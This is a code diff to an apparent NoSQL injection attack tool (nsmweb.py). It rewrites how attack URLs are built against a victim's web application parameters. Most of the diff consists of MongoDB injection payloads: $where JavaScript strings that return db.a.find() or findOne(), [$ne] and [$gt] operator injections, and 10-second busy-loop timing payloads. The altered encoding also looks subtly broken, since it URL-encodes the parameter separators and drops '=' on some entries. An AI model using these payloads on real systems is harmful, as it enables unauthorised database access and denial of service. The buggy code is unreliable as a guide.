diff --git a/nsmweb.py b/nsmweb.py
index 167de1e..4dd77c8 100644
--- a/nsmweb.py
+++ b/nsmweb.py
@@ -133,6 +133,7 @@ def getApps(webPort,victim,uri,https,verb,requestHeaders):
         else:
             print "Test 2: $where injection (string escape)"
 
+        print uriArray[2]
         req = urllib2.Request(uriArray[2], None, requestHeaders)
         errorCheck = errorTest(str(urllib2.urlopen(req).read()),testNum)
 
@@ -890,49 +891,31 @@ def buildUri(origUri, randValue):
         return
 
     x = 0
-    uriArray[0] = split_uri[0] + "?"
-    uriArray[1] = split_uri[0] + "?"
-    uriArray[2] = split_uri[0] + "?"
-    uriArray[3] = split_uri[0] + "?"
-    uriArray[4] = split_uri[0] + "?"
-    uriArray[5] = split_uri[0] + "?"
-    uriArray[6] = split_uri[0] + "?"
-    uriArray[7] = split_uri[0] + "?"
-    uriArray[8] = split_uri[0] + "?"
-    uriArray[9] = split_uri[0] + "?"
-    uriArray[10] = split_uri[0] + "?"
-    uriArray[11] = split_uri[0] + "?"
-    uriArray[12] = split_uri[0] + "?"
-    uriArray[13] = split_uri[0] + "?"
-    uriArray[14] = split_uri[0] + "?"
-    uriArray[15] = split_uri[0] + "?"
-    uriArray[16] = split_uri[0] + "?"
-    uriArray[17] = split_uri[0] + "?"
-    uriArray[18] = split_uri[0] + "?"
+
 
     for item in paramName:
 
         if paramName[x] in injOpt:
             uriArray[0] += paramName[x] + "=" + randValue + "&"
             uriArray[1] += paramName[x] + "[$ne]=" + randValue + "&"
-            uriArray[2] += paramName[x] + "=" + urllib.quote("a'; return db.a.find(); var dummy='!") + "&"
-            uriArray[3] += paramName[x] + "=" + urllib.quote("1; return db.a.find(); var dummy=1") + "&"
-            uriArray[4] += paramName[x] + "=" + urllib.quote("a'; return db.a.findOne(); var dummy='!") + "&"
-            uriArray[5] += paramName[x] + "=" + urllib.quote("1; return db.a.findOne(); var dummy=1") + "&"
-            uriArray[6] += paramName[x] + "=" + urllib.quote("a'; return this.a != '" + randValue + "'; var dummy='!") + "&"
-            uriArray[7] += paramName[x] + "=" + urllib.quote("1; return this.a !=" + randValue + "; var dummy=1") + "&"
+            uriArray[2] += paramName[x] + "=a'; return db.a.find(); var dummy='!" + "&"
+            uriArray[3] += paramName[x] + "=1; return db.a.find(); var dummy=1" + "&"
+            uriArray[4] += paramName[x] + "=a'; return db.a.findOne(); var dummy='!" + "&"
+            uriArray[5] += paramName[x] + "=1; return db.a.findOne(); var dummy=1" + "&"
+            uriArray[6] += paramName[x] + "=a'; return this.a != '" + randValue + "'; var dummy='!" + "&"
+            uriArray[7] += paramName[x] + "=1; return this.a !=" + randValue + "; var dummy=1" + "&"
             uriArray[8] += paramName[x] + "[$gt]=&"
-            uriArray[9] += paramName[x] + "=" + urllib.quote("1; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy=1") + "&"
-            uriArray[10] += paramName[x] + "=" + urllib.quote("a\"; return db.a.find(); var dummy='!") + "&"
-            uriArray[11] += paramName[x] + "=" + urllib.quote("a\"; return this.a != '" + randValue + "'; var dummy='!") + "&"
-            uriArray[12] += paramName[x] + "=" + urllib.quote("a\"; return db.a.findOne(); var dummy=\"!") + "&"
-            uriArray[13] += paramName[x] + "=" + urllib.quote("a\"; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy=\"!") + "&"
-            uriArray[14] += paramName[x] + urllib.quote("a'; return true; var dum='a")
+            uriArray[9] += paramName[x] + "=1; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy=1" + "&"
+            uriArray[10] += paramName[x] + "=a\"; return db.a.find(); var dummy='!" + "&"
+            uriArray[11] += paramName[x] + "=a\"; return this.a != '" + randValue + "'; var dummy='!" + "&"
+            uriArray[12] += paramName[x] + "=a\"; return db.a.findOne(); var dummy=\"!" + "&"
+            uriArray[13] += paramName[x] + "=a\"; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy=\"!" + "&"
+            uriArray[14] += paramName[x] + "a'; return true; var dum='a"
             uriArray[15] += paramName[x] + "1; return true; var dum=2"
             #Add values that can be manipulated for database attacks
-            uriArray[16] += paramName[x] + "=" + urllib.quote("a\'; ---")
+            uriArray[16] += paramName[x] + "=a\'; ---"
             uriArray[17] += paramName[x] + "=1; if ---"
-            uriArray[18] += paramName[x] + "=" + urllib.quote("a'; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy='!") + "&"
+            uriArray[18] += paramName[x] + "=a'; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy='!" + "&"
 
         else:
             uriArray[0] += paramName[x] + "=" + paramValue[x] + "&"
@@ -959,7 +942,9 @@ def buildUri(origUri, randValue):
     #Clip the extra & off the end of the URL
     x = 0
     while x <= 18:
-        uriArray[x]= uriArray[x][:-1]
+#        uriArray[x]= uriArray[x][:-1]
+        uriArray[x]=split_uri[0]+"?"+urllib.quote_plus(uriArray[x][:-1])
+
         x += 1
 
     return uriArray[0]
@@ -1193,4 +1178,3 @@ def getDBInfo():
         crackHash = raw_input("Crack another hash (y/n)?")
     raw_input("Press enter to continue...")
     return
-